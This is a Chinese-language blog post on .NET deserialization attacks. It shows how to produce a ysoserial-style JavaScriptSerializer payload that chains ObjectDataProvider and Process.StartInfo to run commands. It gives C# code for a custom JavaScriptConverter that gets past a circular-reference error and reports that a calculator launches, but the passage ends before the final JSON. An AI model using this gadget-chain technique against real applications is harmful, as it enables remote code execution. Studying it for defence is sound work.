0x01 现状 dot.NET安全矩阵星球群有位师傅问起如何才能生成和ysoserial一样的JavaScriptSerializer序列化poc,同Json.NET一样序列化使用了ObjectDataProvider类,ObjectInstance属性绑定实例化的Process对象,这里没有使用MethodParameters属性传递参数,而是使用ProcessStartInfo类FileName和Arguments属性承载外部传入的命令,知道了原理我们尝试序列化出Ysoserial这段攻击载荷,但实践时总抛出异常 System.Reflection.RuntimeModule的对象时检测到循环引用。
解决此问题需要声明一个自定义类继承JavaScriptConverter,本身是abstract抽象类包含成员SupportedTypes,表示获取JavaScriptConverter转换器支持的类型,另外包含序列化和反序列化方法
0x02 分析自定义声明ProcessClassConverter类重写JavaScriptConverter.Serialize方法实现在Dictionary字典中添加自定义的序列化属性。核心代码如下 public override IDictionary<string,object> Serialize(object obj, JavaScriptSerializer serializer) { if(obj.GetType() == typeof(Process)) { var process = (Process)obj; var serializedProcess = newDictionary<string, object>(); serializedProcess["StartInfo"] = process.StartInfo; return serializedProcess; } else if(obj.GetType() == typeof(ObjectDataProvider)) { var objectDataProvider =(ObjectDataProvider)obj; varserializedObjectDataProvider = new Dictionary<string, object>(); serializedObjectDataProvider["MethodName"] =objectDataProvider.MethodName; serializedObjectDataProvider["ObjectInstance"] =objectDataProvider.ObjectInstance; returnserializedObjectDataProvider; } else { var serialized = newDictionary<string, object>(); return serialized; }
}
根据输入的对象类型进入不同的序列化条件分支,当前被序列化对象如果是Process,则会将Process.StartInfo属性序列化后存储在为字典的项,如果是ObjectDataProvider,将MethodName、ObjectInstance属性序列化为字典的两个项,目的是根据对象类型执行相应的序列化逻辑,并返回相应的序列化结果。 如愿生成和Ysoserial一模一样的Payload,解答了师傅的疑问。 通过javaScriptDeserialize.Deserialize反序列化下面改造后的JSON,成功弹出计算器
|